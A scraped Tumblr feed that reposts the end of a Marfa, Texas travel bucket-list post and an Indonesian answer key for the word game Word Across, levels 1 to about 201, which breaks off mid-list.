Fans of thrifting can  stop by to see if they can find any treasures in this artsy and ecclectic town.
15. Building 98
Bonnie St, Marfa, TX 79843, map
Once a US army base bachelor offer quarter, it is now known for the WWII German POW murals. The western murals were completed in 1945 and show Marfa’s history in the arts.
16. Marfa Holocaust and Historic Model Ship Museum
901 E Oak St Marfa, TX 79843, map
Find historic artifacts, documents, and books about the Aliyah Bet (Jewish “illegal immigration” ships). What makes it really special is the collection of over 140 handmade, plank-on-frame ship models.
17. El Cosmico
802 S Highland Ave, Marfa, TX 79843, map
El Cosmico has your choice of teepees, yurts, and RVs, and looks like it’s made for the gram.
18. Planet Marfa
200 S Abbot St, Marfa, TX 79843, map
Planet Marfa is a great place to unwind after a long day. The quirky beer garden features a tepee and vintage school bus where you can hang out too.
19. Lost Horse Saloon
306 E San Antonio St, Marfa, TX 79843, map
This local watering hole is a popular hangout spot. The rustic, Western-style decor is the perfect backdrop for drinks and live music.
20. House Bar (Casita Bar)
Ranch Rd 2810, Marfa, TX 79843, map
Step into the 80s at one of the most unique bars we’ve ever been to. It was converted from an old home, and the decor is next level here. They host shows and we only found out about it because we asked the folks at Planet Marfa.
21. The Get Go
208 S Dean St, Marfa, TX 79843, map
The Get Go is an independent grocery store opened in 2007. It features local products, organic and alternative ingredients, and more. Not only can you pick up supplies if everything else is closed, it’s also a great way to get a glimpse of local life in Marfa.
More: 13 Secrets to Traveling like a Local
22. Frama at Tumbleweed Laundry
120 N Austin St, Marfa, TX 79843, map
If you’re looking for a place to get good coffee, a scoop of ice cream, and do your laundry, come to this coffee shop and laundromat pairing. 
More: All the Best Stops on the Ultimate West Coast Road Trip
23. Marfa and Presidio County Museum
110 W San Antonio St, Marfa, TX 79843, map
Located in a historic adobe home built in the 1880s, this museum has a little bit of everything Marfa and Presidio County. It coveres ranching, local military, geology, settlers, Native Americans, and more.
24. Presidio County Courthouse
300 Highland St, Marfa, TX 79843, map
The Presidio County Courthouse was added tot he National Register of Historic Places in 1977. It’s a beautiful building in the heart of the city and you can even check ou the interior.
25. Stardust motel sign
US-90, Marfa, TX 79843, map
The Stardust Motel sign sits on its own just outside of town. There’s no trace of the motel itself, but the light still flickers from time to time.
Map of Things to Do in Marfa TX
More Things to Do in Marfa TX
Cast + Crew
Chinati Hot Springs (Presidio, TX)
Etherington Fine Art
Exhibitions 2D
Faith Alive Cowboy Church Radio Station
Garza Marfa
Ice Plant Museum
Julie Speed Studio
Marfa Activity Center
Marfa Contemporary – Closed
Marfa Fim Festival (late spring)
Marfa Gliders
Marfa Maid Dairy
Marfa Municipal Golf Course
Marfa Myths Music Festival
Marfa Visitor Center
Mirth
Mystery Blimp (on US-90, 15 miles outside Marfa)
Palace Theater
Private Marfa History Tours
Rule Gallery
Best Restaurants in Marfa TX
Buns N’ Roses (Breakfast, $)
Cochineal (New American, $$)
Do Your Thing (Coffee, $)
Frama (Coffee, $)
Food Shark (Mediterranean, $)
Lost Horse Saloon (Bar, $)
Marfa Burrito (Mexican, $)
Pizza Foundation (Pizza, 2$)
Planet Marfa (Bar, $)
Stellina (Italian, 2$)
Bar St George (Bar, $), Boyz 2 Men (Breakfast, $), Capri (New American, $, 3.5), Mando’s (Tex Mex, $), Jett’s Grill (American, $), LaVenture (Seafood, $​$)
What to Pack for Marfa TX
!function(d,s,id){ var e, p = /^http:/.test(d.location) ? 'http' : 'https'; if(!d.getElementById(id)) { e = d.createElement(s); e.id = id; e.src = p + '://widgets.rewardstyle.com/js/shopthepost.js'; d.body.appendChild(e); } if(typeof window.__stp === 'object') if(d.readyState === 'complete') { window.__stp.init(); } }(document, 'script', 'shopthepost-script');
Turn on your JavaScript to view content
Where to Stay in Marfa Texas
Hotel Paisano – We stayed at Hotel Paisano during our visit to Marfa. It’s centrally located the hotel is full of history. You’ll find GIANT memorabilia throughout the lobby and hallways too.
Hotel Saint George
Thunderbird Hotel
El Cosmico for Glamping
What's Nearby
Fort Davis National Historic Site (25 min, 22.5 miles)
Davis Mountains State Park (27 min, 24.1 miles)
McDonald Observatory (50 min, 38 miles)
Big Bend National Park (1 hr 35 min, 98.2 miles)
More Resources
Lonely Planet Texas Travel Guide
West Texas Travel Guide
Texas State Map / Waterproof Texas State Map
Texas Road & Recreation Atlas
2019 Rand Mcnally Large Scale Road Atlas
Have you been before? Any other things to do in Marfa TX we’re missing?
Did you enjoy this post? Pin it for later
SEE MORE CITY BUCKET LISTS
⟡⟡⟡⟡⟡
ATLANTA BUCKET LIST
PDX BUCKET LIST 
CHARLESTON SC BUCKET LIST
LAS VEGAS BUCKET LIST
LA BUCKET LIST
NYC BUCKET LIST
SAN DIEGO BUCKET LIST
ASHEVILLE NC BUCKET LIST
ATX BUCKET LIST
NEW ORLEANS BUCKET LIST
ORLANDO BUCKET LIST
SAN FRANCISCO BUCKET LIST
SEATTLE BUCKET LIST
WASHINGTON DC BUCKET LIST
“Discovery consists not of seeking new lands but in seeing with new eyes” – M. Proust
Esther + Jacob
Esther and Jacob are the founders of Local Adventurer, which is one of the top 5 travel blogs in the US. They believe that adventure can be found both near and far and hope to inspire others to explore locally. They explore a new city in depth every year and currently base themselves in Las Vegas.
PrevPreviousHow We Made Over $13.1K in June – Blog Income Report
You might also love
All the Best Stops on the Ultimate West Texas Road Trip
49 Best Places to Eat in Austin Texas
101 Things to Do in Austin Bucket List
All articles loaded
No more articles to load
The post 25 Coolest Things to Do in Marfa Texas appeared first on Local Adventurer » Travel Adventures in NYC + World Wide.
1 note · View note
kabargames · 5 years ago
Photo
Tumblr media
Cobain Nih! 6 Tips Farming Mobile Legends Biar Cepat Kaya
(function(d,a,b,l,e,_) if(d[b]&&d[b].q)return;d[b]=function()(d[b].q=d[b].q;e=a.createElement(l); e.async=1;e.charset='utf-8';e.src='//static.dable.io/dist/plugin.min.js'; _=a.getElementsByTagName(l)[0];_.parentNode.insertBefore(e,_); )(window,document,'dable','script'); dable('setService', 'kabargames.id'); dable('sendLogOnce'); dable('renderWidget', 'dablewidget_1oV9EjXP'); Lagi nyari kunci jawaban game Word Across karena ingin lancar berbahasa Inggris? Buat Kamu yang ingin lancar berbahasa Inggris tapi nggak punya cukup uang untuk ikut kursus atau sekedar membeli kamus Bahasa Inggris. Kamu bisa memanfaatkan game Word Across sebagai sarana belajar dan praktek berbahasa Inggris. Pasalnya, game yang menghubungkan kata dalam bahasa Inggris ini sangat baik buat Kamu yang sedang mempelajari kata-kata dari bahasa Inggris. Kalau kesulitan menjawab dibeberapa level tertentu Kamu bisa menggunakan kunci jawaban game Word Across terlengkap dari level 1 sampai dengan level 210 yang sudah Kabar Games siapakan berikut ini. Baca Juga : Nikahan Mantan: Saatnya Lampiaskan Rasa Sakit Hatimu Disini 5 Hero Mobile Legends dengan Kemampuan Mirip Cheat Map Hack Hiram, Update Berskala Besar Pertama ArcheAge! Ini Fiturnya Genshin Impact: Gameplay, Karakter, Review & Spesifikasi PC Kunci Jawaban Braindom Terbaru dari Level 1 – 225 googletag.cmd.push(function() googletag.display('div-gpt-ad-9949385-2'); ); Kunci Jawaban Word Across Level 1 – 20 Level 1 How, Who Level 2 Add, Dad Level 3 Are, Ear, Era Level 4 Six, Is Level 5 Wall, All, Law Bonus Awl Level 6 Yard, Day, Dry, Ray Bonus Dray, Rad, Rya, Yar Level 7 Your, Our, You Level 8 Wars, Raw, Saw, War, Was Bonus Raws Level 9 Eyes, Eye, See, Yes Level 10 Gold, Dog, God, Log, Old Bonus Dol Level 11 Note, Tone, Net, Not, One, Ten, Toe, Ton Bonus Eon Level 12 Play, Lap, Lay, Pal, Pay Bonus Paly, Alp, Ply, Pya, Yap Level 13 Sink, Skin, Ink, Kin, Sin, Ski Bonus Inks, Kins Level 14 Sends, Ends, Send, Den, End Bonus Dens, Ness, Sned, Eds, Ens Level 15 Eight, Get, Hit, The, Tie Bonus Gite, Gie, Git, Hie, Teg Level 16 Worn, Nor, Now, Own, Row, Won Level 17 Black, Back, Lack, Cab, Lab Bonus Balk, Calk, Alb, Bal, Kab, Lac Level 18 Unity, Tiny, Unit, Nut, Tin Bonus Nit, Tui, Tun, Yin Level 19 Cakes, Cake, Case, Sack, Sake, Ask, Sea Bonus Aces, Cask, Kaes, Keas, Ace, Kas, Kea, Sac, Sec, Ska Level 20 Meets, Meet, Seem, Met, See, Set Bonus Metes, Teems, Emes, Mete, Seme, Stem, Teem, Tees, Eme, Tee Kunci Jawaban Word Across Level 21 – 40 Level 21 Pact, Act, Apt, Cap, Cat, Pat, Tap Bonus Pac Level 22 Hosts, Shots, Host, Shot, Toss, Hot Bonus Hots, Sots, Tosh, Sot, Tho Level 23 Guide, Die, Dig, Due, Dug Bonus Gied, Gude, Ged, Gid, Gie Level 24 Loves, Solve, Lose, Love, Sole Bonus Voles, Levo, Oles, Sloe, Voes, Vole, Lev, Ole, Sel, Sol, Voe Level 25 Seems, Mess, Seem, Sees, See Bonus Semes, Emes, Seme, Eme Level 26 Suits, Sits, Suit, Its, Sit Bonus Situs, Tuis, Sis, Tis, Tui Level 27 Slips, Lips, Slip, Lip, Sip Bonus Lisps, Lisp, Psis, Sips, Sis Level 28 Clues, Clue, Cues, Cue, Sec, Sue, Use Bonus Luces, Ecus, Luce, Lues, Slue, Cel, Leu, Sel Level 29 Petty, Type, Pet, Yep, Yet Bonus Yett, Pye Level 30 Eased, Ease, Seed, Sad, Sea, See Bonus Aedes, Dees, Sade, Ads, Eds Level 31 Doubt, Bout, Bud, But, Dot, Tub, Out, Duo Bonus Bod, Bot, Dub, Oud, Tod Level 32 Drums, Drum, Mud, Rum, Sum Bonus Muds, Rums, Surd, Urds, Urd Level 33 Hardy, Hard, Yard, Day, Dry, Had, Hay, Ray Bonus Hydra, Dray, Dah, Rad, Rya, Yah, Yar Level 34 Deter, Deer, Reed, Tree, Red Bonus Treed, Dere, Dree, Rede, Rete, Teed, Ere, Ree, Ret, Ted, Tee Level 35 Lousy, Soul, Sly, Soy, You Bonus Yous, Sol, Sou Level 36 Allow, Wall, All, Law, Low, Owl Bonus Alow, Olla, Awl Level 37 Wagon, Gown, Ago, Now, Own, Wan, Won Bonus Gowan, Agon, Gnaw, Awn, Gan, Goa, Nag, Nog, Wag Level 38 Brash, Bars, Bash, Rash, Ash, Bar, Bra, Has Bonus Arbs, Bras, Abs, Arb, Sab Level 39 Style, Lets, Let, Set, Yes, Yet Bonus Lest, Leys, Lyes, Lyse, Stye, Tels, Tyes, Ley, Lye, Sel, Sly, Sty Level 40 Texts, Test, Text, Set, Sex Bonus Sett, Sext, Stet, Tets Kunci Jawaban Word Across Level 41 – 60 Level 41 Flood, Fold, Food, Fool, Old Bonus Loof, Dol, Loo Level 42 Sears, Ears, Seas, Are, Ear, Era, Sea Bonus Rases, Eras, Rase, Sear, Sera, Sers, Ers, Res, Ser Level 43 Donor, Door, Odor, Don, Nod, Nor, Rod Bonus Rondo, Ordo, Rood, Dor Level 44 Apply, Play, Lap, Lay, Pal, Pay Bonus Palp, Paly, Alp, App, Pap, Ply, Pya, Yap Level 45 Catch, Chat, Act, Cat, Hat Bonus Tach Level 46 Kicks, Kick, Sick, Sic, Ski Level 47 Seven, Even, Seen, Eve, See Bonus Evens, Neves, Esne, Eves, Neve, Sene, Vees, Ens, Nee Level 48 Third, Dirt, Hid, Hit, Rid Bonus Thir, Dit Level 49 Knelt, Ken, Let, Net, Ten Bonus Kelt, Kent, Lent, Elk, Lek Level 50 Saved, Save, Vase, Sad, Sea Bonus Devas, Deva, Devs, Sade, Ads, Eds, Vas Level 51 Signs, Sings, Sign, Sing, Sins, Gin, Sin Bonus Gins, Sis Level 52 Snack, Sack, Sank, Scan, Ask, Can Bonus Cans, Cask, Kas, Sac, Ska Level 53 Lofty, Loft, Fly, Lot, Toy Bonus Oft Level 54 Berth, Herb, Bet, Her, The Bonus Beth, Reb, Ret Level 55 Mixed, Dime, Die, Dim, Mid, Mix Bonus Idem, Med Level 56 Bends, Beds, Bend, Ends, Send, Bed, Den, End Bonus Bens, Dens, Nebs, Sned, Ben, Bes, Deb, Eds, Ens, Neb Level 57 Rough, Hour, Hog, Hug, Our, Rug Bonus Gor Level 58 Flips, Flip, Lips, Slip, Lip, Sip Bonus Fils, Lisp, Fil Level 59 Ounce, Cone, Once, Cue, One Bonus Unco, Con, Eon Level 60 Brink, Rink, Bin, Ink, Kin, Rib Bonus Birk, Kirn, Irk, Kir, Nib Kunci Jawaban Word Across Level 61 – 80 Level 61 Porch, Chop, Crop, Cop, Hop, Pro Bonus Cor, Orc, Roc Level 62 Notch, Cot, Hot, Not, Ton Bonus Chon, Con, Hon, Nth, Tho Level 63 Thumb, But, Hub, Hum, Hut, Tub Bonus Bhut, Bum, Mut Level 64 Swung, Guns, Snug, Sung, Gun, Sun Bonus Gnus, Gnu Level 65 Comer, Come, Core, More, Ore Bonus Cero, Corm, Merc, Omer, Cor, Moc, Orc, Rec, Rem, Roc, Roe Level 66 Yells, Sell, Yell, Sly, Yes Bonus Ells, Leys, Lyes, Lyse, Ley, Lye, Sel Level 67 Stall, Last, Salt, Tall, All Bonus Talls, Alls, Alts, Lats, Slat, Alt, Lat, Sal, Sat Level 68 Drama, Arm, Dam, Mad, Mar Bonus Damar, Dram, Maar, Mara, Rad, Ram Level 69 Agree, Eager, Gear, Rage, Age, Are, Ear, Era Bonus Eagre, Agee, Ager, Gree, Ere, Erg, Gar, Rag, Ree, Reg Level 70 Grill, Gill, Girl, Ill, Rig Bonus Rill Level 71 Terms, Rest, Stem, Term, Met, Set Bonus Erst, Rems, Rets, Tres, Ers, Rem, Res, Ret, Ser Level 72 Would, Loud, Duo, Low, Old, Owl Bonus Wold, Dol, Dow, Oud, Wud Level 7 Hairy, Airy, Hair, Air, Hay, Ray Bonus Ahi, Rai, Ria, Rya, Yah, Yar Level 74 Crown, Corn, Crow, Worn, Cow, Nor, Own, Row, Won, Now Bonus Con, Cor, Orc, Roc Level 75 Plank, Plan, Lap, Nap, Pal, Pan Bonus Knap, Lank, Alp Level 76 Match, Chat, Math, Act, Cat, Ham, Hat, Mat Bonus Cham, Mach, Tach, Cam, Mac Level 77 Graph, Harp, Gap, Par, Rap Bonus Gar, Hag, Hap, Rag Level 78 Feeds, Feed, Fees, Seed, Fed, Fee, See Bonus Dees, Feds, Def, Eds Level 79 Sixth, Hits, This, His, Hit, Its, Sit, Six Bonus Hist, Sith, Tis Level 80 Dirty, Dirt, Tidy, Dry, Rid, Try Bonus Yird, Dit Kunci Jawaban Word Across Level 81 – 100 Level 81 Bases, Base, Bass, Seas, Sea Bonus Sabes, Sabs, Abs, Bes, Sab Level 82 Event, Even, Teen, Vent, Net, Ten, Vet, Eve Bonus Neve, Nee, Tee Level 83 Lacks, Slack, Lack, Sack, Ask Bonus Calks, Calk, Cask, Lacs, Kas, Lac, Sac, Sal, Ska Level 84 Slots, Loss, Lost, Lots, Slot, Toss, Lot Bonus Sols, Sots, Sol, Sot Level 85 Lands, Land, Sand, And, Lad, Sad Bonus Ands, Dals, Dans, Lads, Ads, Dal, Sal Level 86 Blues, Blue, Bus, Sub, Sue, Use Bonus Lubes, Bels, Lube, Lues, Slub, Slue, Bel, Bes, Leu, Sel Level 87 Needy, Deny, Eyed, Need, Den, Dye, End, Eye Bonus Dene, Dyne, Eyen, Eyne, Dey, Nee, Yen Level 88 Guard, Drag, Drug, Grad, Dug, Rug Bonus Dura, Gaud, Gaur, Guar, Ruga, Dag, Gad, Gar, Rad, Rag, Urd Level 89 Spicy, Icy, Sic, Sip, Spy Bonus Pics, Pyic, Yips, Pic, Yip Level 90 Zones, Nose, Ones, Zone, One, Son Bonus Eons, Noes, Sone, Ens, Eon Level 91 Sinks, Skins, Kiss, Sink, Sins, Skin, Skis, Ink, Kin, Ski, Sin Bonus Inks, Kins, Sis Level 92 Props, Pops, Prop, Pop, Pro Bonus Pros, Sop Level 93 Mount, Unto, Not, Nut, Out, Ton Bonus Notum, Muon, Mon, Mot, Mut, Tom, Tun Level 94 Humor, Hour, Hum, Our, Rum Bonus Mohur, Mho, Ohm Level 95 Shuts, Huts, Shut, Thus, Hut Bonus Tush Level 96 Loser, Roles, Lore, Lose, Role, Rose, Sole, Sore, Ore Bonus Lores, Orles, Sorel, Oles, Ores, Orle, Roes, Sloe, Ers, Ole, Res, Roe, Sel, Ser, Sol Level 97 Fungi, Fin, Fun, Gin, Gun Bonus Fig, Fug, Gnu Level 98 Wally, Ally, Wall, All, Law, Lay, Way Bonus Yawl, Awl, Yaw Level 99 Farms, Arms, Farm, Mars, Arm, Far, Mar Bonus Arfs, Rams, Ram Level 100 Aware, Area, Wear, Are, Awe, Ear, Era, Raw, War Bonus Ware, Awa, Wae Daftar Kunci Jawaban Word Across Level 101 – 120 Level 101 Ghost, Hogs, Host, Shot, Hog, Hot, Got Bonus Goths, Gosh, Goth, Hots, Shog, Togs, Tosh, Sot, Tho, Tog Level 102 Tells, Lest, Lets, Sell, Tell, Let, Set Bonus Ells, Tels, Sel Level 103 Mound, Undo, Don, Duo, Nod, Mud Bonus Muon, Udon, Dun, Mod, Mon, Oud Level 104 Theme, Meet, Them, Hem, The, Met Bonus Heme, Mete, Meth, Teem, Thee, Eme, Tee Level 105 World, Lord, Word, Low, Old, Owl, Rod, Row Bonus Wold, Dol, Dor, Dow Level 106 Firms, Firm, Rims, Fir, Rim, Sir Bonus Firs, Mirs, Rifs, Mir, Rif, Sri Level 107 Rapid, Arid, Drip, Paid, Pair, Raid, Aid, Air, Pad, Par, Rap, Rid, Rip, Dip Bonus Pardi, Pard, Dap, Pia, Rad, Rai, Ria Level 108 Hatch, Chat, Act, Cat, Hat Bonus Hath, Tach Level 109 Plump, Lump, Plum, Pulp, Pump, Pup Bonus Pul, Ump Level 110 Knees, Keen, Knee, Seek, Seen, Ken, See Bonus Keens, Skene, Ekes, Esne, Kens, Sene, Skee, Eke, Ens, Nee Level 111 Width, With, Hid, Hit, Wit Bonus Whid, Whit, Dit Level 112 Blast, Bats, Last, Salt, Slab, Tabs, Bat, Lab, Tab, Stab Bonus Blats, Albs, Alts, Bals, Bast, Blat, Labs, Lats, Slat, Abs, Alb, Alt, Bal, Lat, Sab, Sal, Sat Level 113 Peace, Cape, PaCepe, Cep, Pac, Pea Level 114 Shake, Sake, Ash, Ask, Has, Sea, She Bonus Hakes, Haes, Hake, Kaes, Keas, Shea, Hae, Kas, Kea, Ska Level 115 Plots, Lost, Lots, Plot, Post, Pots, Slot, Spot, Stop, Tops, Lot, Opt, Pot, Top Bonus Lops, Opts, Pols, Slop, Lop, Pol, Sol, Sop, Sot Level 116 Burly, Blur, Bury, Ruby, Buy, Rub Bonus Burl, Bur Level 117 Blush, Bush, Lush, Bus, Hub, Sub Bonus Buhls, Buhl, Hubs, Shul, Slub Level 118 Spend, Ends, Pens, Send, Sped, Den, End, Pen Bonus Pends, Dens, Peds, Pend, Sned, Eds, Ens, Ped, Pes Level 119 Grand, Darn, Drag, Grad, Rand, Rang, And, Ran Bonus Dang, Gnar, Gran, Nard, Dag, Gad, Gan, Gar, Nag, Rad, Rag Level 120 Chips, Chip, Ship, His, Sic, Sip Bonus Chis, Hips, Ichs, Phis, Pics, Pish, Hip, Ich, Pic Kunci Jawaban Word Across Level 121 – 140 Level 121 Cones, Cone, Nose, Once, Ones, One, Sec, Son Bonus Scone, Cons, Eons, Noes, Sone, Con, Ens, Eon Level 122 Saint, Satin, Stain, Anti, Ant, Its, Sin, Sit, Tan, Tin Bonus Antis, Tains, Ains, Aits, Anis, Ants, Nits, Sain, Sati, Snit, Tain, Tans, Tins, Ain, Ait, Ani, Nit, Sat, Tis Level 123 Hazel, Hale, Haze, Heal, Zeal, Ale Bonus Laze, Hae, Lea Level 124 Count, Unto, Cot, Cut, Not, Nut, Out, Ton Bonus Unco, Con, Tun Level 125 Coupe, Cope, Coup, Cop, Cue, Cup Bonus Puce, Cep, Ope Level 126 Budge, Bed, Beg, Bud, Bug, Due, Dug Bonus Debug, Gude, Deb, Dub, Ged Level 127 Taxed, Date, Ate, Axe, Eat, Tad, Tax, Tea Bonus Axed, Tae, Ted Level 128 Bring, Grin, Ring, Big, Bin, Gin, Rib, Rig Bonus Brig, Girn, Gib, Nib Level 129 Aptly, Play, Apt, Lay, Pal, Pat, Pay, Tap, Lap Bonus Platy, Typal, Paly, Paty, Plat, Alp, Alt, Lat, Ply, Pya, Yap Level 130 Genus, Guns, Snug, Sung, Gun, Sue, Sun, Use Bonus Negus, Engs, Gens, Genu, Gnus, Negs, Ens, Gen, Gnu, Neg Level 131 Dared, Dread, Dare, Dead, Dear, Read, Add, Are, Dad, Ear, Era, Red Bonus Adder, Readd, Redd, Rad Level 132 Crawl, Claw, Arc, Car, Law, Raw, War Bonus Carl, Craw, Awl, Caw, Lac, Lar Level 133 Tents, Nest, Nets, Sent, Tent, Test, Net, Set, Ten Bonus Netts, Stent, Nett, Sett, Stet, Tens, Tets, Ens Level 134 Found, Fond, Fund, Undo, Don, Duo, Fun, Nod Bonus Fondu, Udon, Dun, Fon, Fou, Fud, Oud Level 135 Thyme, Myth, Them, They, Hem, Met, The, Yet Bonus Hyte, Meth, Thy Level 136 Clown, Cow, Low, Now, Owl, Own, Won Bonus Cowl, Lown, Col, Con Level 137 Minor, Iron, Norm, Ion, Nor, Rim Bonus Inro, Morn, Noir, Mir, Mon, Nim Level 138 Yacht, Chat, Act, Cat, Hat, Hay Bonus Achy, Chay, Tach, Cay, Thy, Yah Level 139 Abyss, Bass, Bays, Says, Bay, Say Bonus Bassy, Abys, Sabs, Abs, Aby, Ays, Sab Level 140 Knife, Fine, Fin, Ink, Ken, Kin Bonus Fink, Kief, Kine, Fen, Kef, Kif Kunci Jawaban Word Across Level 141 – 160 Level 141 Gamut, Gum, Gut, Mat, Mug, Tag, Tug Bonus Gaum, Gam, Gat, Mag, Mut, Uta Level 142 Drift, Dirt, Rift, Fir, Fit, Rid Bonus Frit, Dif, Dit, Fid, Rif Level 143 Short, Host, Shot, Sort, Hot, Rot Bonus Horst, Hots, Orts, Rhos, Rots, Thro, Tors, Tosh, Ort, Sot, Tho, Tor Level 144 Paced, Cape, Pace, Ace, Ape, Cap, Pad Bonus Caped, Aced, Aped, Cade, Dace, Cep, Dap, Pac, Pea, Ped Level 145 Asked, Desk, Sake, Ask, Sad, Sea Bonus Daks, Kaes, Keas, Sade, Ads, Dak, Eds, Kas, Kea, Ska Level 146 Sheen, Hens, Seen, Hen, See, She Bonus Esne, Sene, Ens, Nee Level 147 Awash, Wash, Ash, Has, Saw, Was Bonus Haws, Shaw, Shwa, Awa, Haw Level 148 Brush, Shrub, Bush, Rubs, Rush, Bus, Hub, Rub, Sub Bonus Buhrs, Buhr, Burs, Hubs, Urbs, Bur Level 149 Lends, Ends, Lend, Lens, Send, Sled, Den, End, Led Bonus Dels, Dens, Elds, Sned, Del, Eds, Eld, Ens, Sel Level 150 Waved, Wade, Wave, Awe, Dew, Wad, Wed Bonus Awed, Deva, Daw, Wae Level 151 Picks, Pick, Sick, Skip, Sic, Sip, Ski Bonus Kips, Pics, Spik, Kip, Pic Level 152 Opens, Nope, Nose, Ones, Open, Pens, Pose, One, Pen, Son Bonus Peons, Pones, Eons, Epos, Noes, Opes, Peon, Peso, Pone, Pons, Sone, Ens, Eon, Ope, Pes, Sop Level 153 Twins, Twin, Wins, Its, Sin, Sit, Tin, Win, Wit Bonus Nits, Snit, Tins, Wist, Wits, Nit, Tis, Wis Level 154 Glaze, Gale, Gaze, Zeal, Age, Ale, Gal, Gel, Lag, Leg Bonus Egal, Laze, Lea, Zag Level 155 Mores, More, Rose, Some, Sore, Ore Bonus Morse, Omers, Mors, Omer, Ores, Rems, Roes, Roms, Ers, Rem, Res, Roe, Ser, Som Level 156 Pouch, Chop, Coup, Ouch, Cop, Cup, Hop Level 157 Snaps, Spans, Pans, Pass, Snap, Span, Nap, Pan, Sap, Spa Bonus Asps, Naps, Sans, Saps, Spas, Asp, Pas Level 158 Tonal, Alto, Loan, Ant, Lot, Not, Tan, Ton Bonus Notal, Talon, Tolan, Lota, Nota, Tola, Alt, Lat, Oat Level 159 Begin, Being, Binge, Beg, Big, Bin, Gin Bonus Bine, Gibe, Ben, Gen, Gib, Gie, Neb, Neg, Nib Level 160 Flats, Fast, Flat, Last, Salt, Aft, Fat Bonus Alts, Fats, Lats, Slat, Alt, Lat, Sal, Sat Kunci Jawaban Word Across Level 161 – 180 Level 161 Puree, Peer, Pure, Per, Rep, Rue Bonus Rupee, Pere, Pree, Ere, Ree Level 162 Amber, Bare, Beam, Bear, Mare, Are, Arm, Bar, Bra, Ear, Era, Mar Bonus Bream, Embar, Barm, Bema, Berm, Brae, Ream, Arb, Bam, Mae, Ram, Reb, Rem Level 163 Fumes, Fuse, Muse, Sue, Use, Sum Bonus Emus, Fems, Feus, Fume, Emu, Fem, Feu Level 164 Belts, Belt, Best, Bets, Lest, Lets, Let, Set, Bet Bonus Blest, Bels, Tels, Bel, Bes, Sel Level 165 Dough, Dog, Dug, Duo, God, Hog, Hug Bonus Hod, Oud Level 166 Deity, Diet, Edit, Tide, Tidy, Tied, Die, Dye, Tie, Yet Bonus Dite, Yeti, Dey, Dit, Ted Level 167 Crowd, Cord, Crow, Word, Cod, Cow, Rod, Row Bonus Cor, Doc, Dor, Dow, Orc, Roc Level 168 Muted, Duet, Mute, Due, Met, Mud Bonus Emu, Med, Mut, Ted, Ute Level 169 Batch, Bath, Chat, Act, Bat, Cab, Cat, Hat, Tab Bonus Bach, Baht, Tach Level 170 Crime, Mice, Rice, Ice, Ire, Rim Bonus Cire, Emic, Emir, Merc, Mire, Rime, Mic, Mir, Rec, Rem Level 171 Libel, Bell, Bile, Bill, Ill, Lie Bonus Bel, Lei, Lib Level 172 Admit, Amid, Maid, Aid, Aim, Dam, Dim, Mad, Mat, Mid, Tad Bonus Adit, Ait, Ami, Dit Level 173 Drink, Kind, Rind, Rink, Din, Kid, Kin, Rid, Ink Bonus Dink, Dirk, Kirn, Irk, Kir Level 174 Youth, Hot, Hut, Out, Toy, You Bonus Thou, Hoy, Tho, Thy Level 175 Ports, Sport, Port, Post, Pots, Sort, Spot, Stop, Tops, Opt, Pot, Pro, Rot, Top Bonus Prost, Strop, Opts, Orts, Pros, Rots, Tors, Trop, Ort, Sop, Sot, Tor Level 176 Snake, Sneak, Sake, Sane, Sank, Ask, Ken, Sea Bonus Kanes, Skean, Anes, Kaes, Kane, Keas, Kens, Ane, Ens, Kas, Kea, Nae, Ska Level 177 Tenth, Tent, Then, Hen, Net, Ten, The Bonus Hent, Nett, Teth, Nth Level 178 Shady, Dash, Days, Hays, Ash, Day, Had, Hay, Sad, Say, Shy, Has Bonus Dashy, Ashy, Dahs, Shad, Shay, Ads, Ays, Dah, Yah Level 179 Champ, Camp, Chap, Cap, Ham, Map Bonus Caph, Cham, Mach, Amp, Cam, Hap, Mac, Pac, Pam Level 180 Dense, Needs, Ends, Need, Seed, Seen, Send, Den, End, See Bonus Denes, Dees, Dene, Dens, Esne, Sene, Sned, Eds, Ens, Nee Kunci Jawaban Word Across Level 181 – 200 Level 181 Spike, Pies, Pike, Skip, Pie, Sip, Ski Bonus Kepis, Pikes, Kepi, Keps, Kips, Sike, Sipe, Skep, Spik, Kep, Kip, Pes, Sei Level 182 Canoe, Ocean, Cane, Cone, Once, Ace, Can, One Bonus Acne, Aeon, Ane, Con, Eon, Nae, Oca Level 183 Drawn, Darn, Dawn, Draw, Rand, Wand, Ward, Warn, And, Ran, Raw, Wad, Wan, War Bonus Nard, Awn, Daw, Rad Level 184 Ninth, Hint, Thin, Hit, Inn, Tin Bonus Hin, Nit, Nth Level 185 Stirs, Sits, Stir, Its, Sir, Sit Bonus Sirs, Sris, Sis, Sri, Tis Level 186 Apple, Leap, Pale, Plea, Ale, Ape, Lap, Pal, Pep Bonus Appel, Palp, Peal, Alp, App, Lea, Pap, Pea Level 187 Scrub, Curb, Rubs, Bus, Cub, Rub, Sub Bonus Curbs, Burs, Crus, Cubs, Curs, Urbs, Bur, Cru, Cur Level 188 Pasta, Past, Pats, Taps, Apt, Pat, Sap, Spa, Tap Bonus Tapas, Spat, Tapa, Asp, Pas, Sat Level 189 Helms, Helm, Mesh, Elm, Hem, She Bonus Elms, Hems, Mels, Mel, Sel Level 190 Owing, Gown, Wing, Gin, Ion, Now, Own, Wig, Win, Won Bonus Wino, Nog Level 191 Aloft, Float, Alto, Flat, Loaf, Loft, Aft, Fat, Lot Bonus Foal, Lota, Tola, Alt, Lat, Oat, Oft Level 192 Cruel, Ulcer, Clue, Cure, Curl, Lure, Rule, Cue, Rue Bonus Lucre, Ecru, Luce, Cel, Cru, Cur, Leu, Rec Level 193 Zebra, Bare, Bear, Are, Bar, Bra, Ear, Era Bonus Braze, Brae, Raze, Arb, Reb Level 194 Mouse, Muse, Some, Sue, Use, Sum Bonus Moues, Emus, Moue, Sumo, Emu, Som, Sou Level 195 Steps, Pest, Pets, Sets, Step, Pet, Set Bonus Pests, Septs, Psst, Sept, Pes Level 196 Cover, Core, Cove, Over, Rove, Ore, Rev Bonus Cero, Cor, Orc, Rec, Roc, Roe, Voe Level 197 Rebel, Beer, Reel, Bee, Eel, Lee Bonus Leer, Bel, Ere, Reb, Ree Level 198 Cloud, Could, Cold, Loud, Cod, Duo, Old Bonus Clod, Col, Cud, Doc, Dol, Oud Level 199 Field, Filed, File, Fled, Idle, Lied, Life, Die, Elf, Fed, Led, Lid, Lie Bonus Felid, Flied, Deil, Deli, Diel, Lief, Def, Del, Dif, Eld, Fid, Fil, Lei Level 200 Boost, Boots, Boot, Soot, Sob, Too Bonus Boos, Bots, Oots, Stob, Bot, Sot Kunci Jawaban Word Across Level 200 – 210 Level 201 Thank, Hank, Tank, Than, Ant, Hat, Tan Bonus Ankh, Hant, 